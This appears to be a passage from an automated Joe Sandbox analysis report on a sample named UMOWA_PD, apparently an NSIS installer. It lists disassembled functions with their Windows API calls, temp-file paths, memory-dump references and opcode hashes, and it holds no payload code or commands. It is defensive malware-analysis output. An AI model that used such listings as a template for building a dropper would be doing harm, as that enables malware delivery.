                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                    • Instruction ID: 2d246cc9a99bab59b70d05231fecbcf7b107c6ac3beee636f2a296df3f85dc82
                                                                                    • Opcode Fuzzy Hash: aff26f2f30a057b7958a1e63094fc459aa306f2dc33e22a09454c964c074026f
                                                                                    • Instruction Fuzzy Hash: 7DA14571E04228DBDF28CFA8C8546ADBBB1FF44305F10816AD856BB281D7786986DF45
                                                                                    Function 00407275 Relevance: 5.2, APIs: 4, Instructions: 208COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                    • Instruction ID: 7b0bebd33542e08950ef610181a47380a5391ae5859bceecccad38cd1577eaed
                                                                                    • Opcode Fuzzy Hash: 3ac8a4bfdb441625c816955e49305bbe8ba575533dfee591c2cbe8a61bd4ebd3
                                                                                    • Instruction Fuzzy Hash: 90911370E04228CBDF28CF98C854BADBBB1FF44305F14816AD856BB291D778A986DF45
                                                                                    Function 00406F8B Relevance: 5.2, APIs: 4, Instructions: 205COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                    • Instruction ID: bb56daa647bdc5b8eebe4baaa8fd529e9884befb34821132b6d53cadc5dab3c5
                                                                                    • Opcode Fuzzy Hash: 4946c792fe510ceb6f898f1d350858136886e798b9c642bfd65d449563e2a9d8
                                                                                    • Instruction Fuzzy Hash: 84814571E04228DBDF24CFA8C844BADBBB1FF44305F24816AD456BB281D778A986DF05
                                                                                    Function 00406A90 Relevance: 5.2, APIs: 4, Instructions: 198COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                    • Instruction ID: 4c059968f2e2b24eb1e5e0c9ef09b3253d11b2009d36a285a9eb138ea7c1b005
                                                                                    • Opcode Fuzzy Hash: 40acfd0569c51a0ed8326a41ceea3e1cadcd4e5eff2ca22ce679809f46488b45
                                                                                    • Instruction Fuzzy Hash: 5B815971E04228DBDF24CFA8C8447ADBBB0FF44305F20816AD456BB281D7786986DF45
                                                                                    Function 00406EDE Relevance: 5.2, APIs: 4, Instructions: 180COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                    • Instruction ID: d60cf97a253a7e6a69b3ee1887f4eadeccf904993e12f72ad3f9abe973951288
                                                                                    • Opcode Fuzzy Hash: 7ecfdc6a50dff7d8916ace13d1bdc0889b51af96eca2ccc09b1dd9eb10df24f6
                                                                                    • Instruction Fuzzy Hash: A1711371E04228DBDF24CFA8C844BADBBB1FF44305F15806AD856BB281D778A986DF45
                                                                                    Function 00406FFC Relevance: 5.2, APIs: 4, Instructions: 170COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                    • Instruction ID: 85b777fa610547d2183482adb232412925907ddbdaa1129d6a49a25a13354a82
                                                                                    • Opcode Fuzzy Hash: c11de4171378e898cf9dd0cf6cc2122b5d0c7e9a287f85b53884598f27a71e29
                                                                                    • Instruction Fuzzy Hash: 9D714671E04228DBDF28CF98C844BADBBB1FF44305F14816AD856BB281D778A986DF45
                                                                                    Function 00406F48 Relevance: 5.2, APIs: 4, Instructions: 168COMMON
                                                                                    Download Yara Rule
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID:
                                                                                    • String ID:
                                                                                    • API String ID:
                                                                                    • Opcode ID: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                    • Instruction ID: 068c41ea6699cb9b24c5d93e390f6e15a746ef4a0ce6273c00671ddd4a3661d6
                                                                                    • Opcode Fuzzy Hash: f1fa58480ac5da56fa6cc6281bf6ff7b0f773126a89d504887f275dca7af18c3
                                                                                    • Instruction Fuzzy Hash: E0715771E04228DBDF24CF98C844BADBBB1FF44305F15806AD856BB281C778AA86DF45
                                                                                    Function 004020DD Relevance: 4.6, APIs: 3, Instructions: 73libraryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNELBASE(00000000,?,000000F0), ref: 00402108
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000,?), ref: 004055DE
                                                                                      • Part of subcall function 004055A6: lstrlenW.KERNEL32(004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000,?,?,?,?,?,?,?,?,?,004033F2,00000000), ref: 004055EE
                                                                                      • Part of subcall function 004055A6: lstrcatW.KERNEL32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,004033F2,004033F2,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,00000000,00418EC0,00000000), ref: 00405601
                                                                                      • Part of subcall function 004055A6: SetWindowTextW.USER32(Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll,Skipped: C:\Users\user\AppData\Local\Temp\nscE8.tmp\System.dll), ref: 00405613
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405639
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 00405653
                                                                                      • Part of subcall function 004055A6: SendMessageW.USER32(?,00001013,?,00000000), ref: 00405661
                                                                                    • LoadLibraryExW.KERNEL32(00000000,?,00000008,?,000000F0), ref: 00402119
                                                                                    • FreeLibrary.KERNEL32(?,?,000000F7,?,?,00000008,?,000000F0), ref: 00402196
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: MessageSend$Librarylstrlen$FreeHandleLoadModuleTextWindowlstrcat
                                                                                    • String ID:
                                                                                    • API String ID: 334405425-0
                                                                                    • Opcode ID: d9c937c8948d5d37c50d665afaa08982dd07723c7233c08654f6d387f6d988e5
                                                                                    • Instruction ID: a8e1189db69026d3652efcc6ea6e12950466f7228f8283b9583ebcadfcee3162
                                                                                    • Opcode Fuzzy Hash: d9c937c8948d5d37c50d665afaa08982dd07723c7233c08654f6d387f6d988e5
                                                                                    • Instruction Fuzzy Hash: 8D215031904108BADF11AFA5CE49A9E7AB1BF44359F20413BF105B91E1CBBD89829A5D
                                                                                    Function 00401BA0 Relevance: 4.6, APIs: 2, Strings: 1, Instructions: 72memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00401C10
                                                                                    • GlobalAlloc.KERNELBASE(00000040,00000804), ref: 00401C22
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Global$AllocFree
                                                                                    • String ID: Call
                                                                                    • API String ID: 3394109436-1824292864
                                                                                    • Opcode ID: e33d9b87315d49944383bdaefc5ba1c13c649625d32d96b536ae23307826b8e2
                                                                                    • Instruction ID: 4f57f46d507340bd06d3479355973fa93edc06c360faa14cbfff374a5dc28ea7
                                                                                    • Opcode Fuzzy Hash: e33d9b87315d49944383bdaefc5ba1c13c649625d32d96b536ae23307826b8e2
                                                                                    • Instruction Fuzzy Hash: 5721F673904214EBDB30AFA8DE85A5F72B4AB08324714053FF642B32C4C6B8DC418B9D
                                                                                    Function 00402304 Relevance: 4.6, APIs: 3, Instructions: 51stringCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0040687E: FindFirstFileW.KERNELBASE(?,00425F58,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00405F41,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\), ref: 00406889
                                                                                      • Part of subcall function 0040687E: FindClose.KERNEL32(00000000), ref: 00406895
                                                                                    • lstrlenW.KERNEL32 ref: 00402344
                                                                                    • lstrlenW.KERNEL32(00000000), ref: 0040234F
                                                                                    • SHFileOperationW.SHELL32(?,?,?,00000000), ref: 00402378
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: FileFindlstrlen$CloseFirstOperation
                                                                                    • String ID:
                                                                                    • API String ID: 1486964399-0
                                                                                    • Opcode ID: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                                                                                    • Instruction ID: e570f7e88bbeadde5f19d209a5805755c0aba3de4ac721a8bb04e236ab5037c1
                                                                                    • Opcode Fuzzy Hash: c92c3ee3ae18d95aa1771da2fabd1cb2010788539e6b4ab8b952707b1b2048dc
                                                                                    • Instruction Fuzzy Hash: 93117071D00318AADB10EFF9DD09A9EB6B8AF14308F10443FA401FB2D1D6BCC9418B59
                                                                                    Function 004025A3 Relevance: 4.5, APIs: 3, Instructions: 47registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegEnumKeyW.ADVAPI32(00000000,00000000,?,000003FF), ref: 004025D6
                                                                                    • RegEnumValueW.ADVAPI32(00000000,00000000,?,?), ref: 004025E9
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: Enum$CloseValue
                                                                                    • String ID:
                                                                                    • API String ID: 397863658-0
                                                                                    • Opcode ID: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                    • Instruction ID: fdeb1b79bd1b5feb028a75c257e649ad2cddb418c0fd83a6570d1db0005c2465
                                                                                    • Opcode Fuzzy Hash: ba34c4ace152f4771e18115f26e31f873f7731feb8842bd8527d51c3f02d9afa
                                                                                    • Instruction Fuzzy Hash: 7D017171904205BFEB149F949E58AAF7678FF40308F10443EF505B61C0DBB84E41976D
                                                                                    Function 004015C6 Relevance: 3.1, APIs: 2, Instructions: 65COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,?,00405F0F,C:\Users\user\AppData\Local\Temp\nscE8.tmp,C:\Users\user\AppData\Local\Temp\nscE8.tmp, 4v,?,C:\Users\user\AppData\Local\Temp\,00405C4D,?,76E63420,C:\Users\user\AppData\Local\Temp\,00434000), ref: 00405EA9
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EAE
                                                                                      • Part of subcall function 00405E9B: CharNextW.USER32(00000000), ref: 00405EC6
                                                                                    • GetFileAttributesW.KERNELBASE(?,?,00000000,0000005C,00000000,000000F0), ref: 0040161F
                                                                                      • Part of subcall function 00405A75: CreateDirectoryW.KERNELBASE(?,?), ref: 00405AB7
                                                                                    • SetCurrentDirectoryW.KERNELBASE(?,00435000,?,00000000,000000F0), ref: 00401652
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                    • String ID:
                                                                                    • API String ID: 1892508949-0
                                                                                    • Opcode ID: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                    • Instruction ID: ceaefb5432ba9a2b041ab88b04bec91c1a8495824eafa6d8534a6d53eb807851
                                                                                    • Opcode Fuzzy Hash: 4b68a463cc784b1945903bcff3764fd9da93cf801788bc1ee3673f5490bf8ecc
                                                                                    • Instruction Fuzzy Hash: 2D11D031504604ABCF206FA5CD4099F36B0EF04368B29493FE941B22E1DA3E4E819E8E
                                                                                    Function 0040252F Relevance: 3.1, APIs: 2, Instructions: 56registryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • RegQueryValueExW.ADVAPI32(00000000,00000000,?,?,?,?,?,?,?,?,00000033), ref: 00402560
                                                                                    • RegCloseKey.ADVAPI32(?,?,?,C:\Users\user\AppData\Local\Temp\nscE8.tmp,00000000,00000011,00000002), ref: 00402602
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15204002987.000000000044C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_UMOWA_PD.jbxd
                                                                                    Similarity
                                                                                    • API ID: CloseQueryValue
                                                                                    • String ID:
                                                                                    • API String ID: 3356406503-0
                                                                                    • Opcode ID: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                    • Instruction ID: b0e4e1b430255f92fa12a8c2637aeeefdc8d450e0dea4cce8f1fdd2cec8de2f5
                                                                                    • Opcode Fuzzy Hash: 56531dfc69c8a788bac7fcb245dee4885a6b683f52a9ec3ede9407be23b67ed3
                                                                                    • Instruction Fuzzy Hash: 61116A71900219EBDF14DFA0DA989AEB7B4BF04349F20447FE406B62C0D7B84A45EB5E
                                                                                    Function 00401389 Relevance: 3.0, APIs: 2, Instructions: 43windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • MulDiv.KERNEL32(00007530,00000000,00000000), ref: 004013E4
                                                                                    • SendMessageW.USER32(0040A2D8,00000402,00000000), ref: 004013F4
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.15203730151.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.15203690311.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203774032.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.15203830209.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
